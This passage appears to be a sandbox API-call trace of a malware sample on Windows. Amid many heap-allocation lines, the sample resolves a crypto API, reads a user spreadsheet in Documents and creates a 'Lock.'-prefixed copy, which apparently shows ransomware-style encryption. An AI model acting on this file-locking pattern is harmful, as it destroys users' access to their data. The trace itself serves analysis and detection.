hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0268.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d18 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c28 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d30 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e20 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c70 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.610] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0268.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0268.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.612] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.612] CryptDestroyHash (hHash=0xa87610) returned 1 [0268.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.613] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/zP4h.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zp4h.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0268.614] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.614] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0268.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.614] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0268.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0268.615] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.zP4h.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.zp4h.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.619] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0268.619] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x4dbb, lpOverlapped=0x0) returned 1 [0268.621] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0268.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f16018 [0268.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1254020 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f1ade0 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f16018 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0268.628] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f16018 [0268.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f1fba8 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) 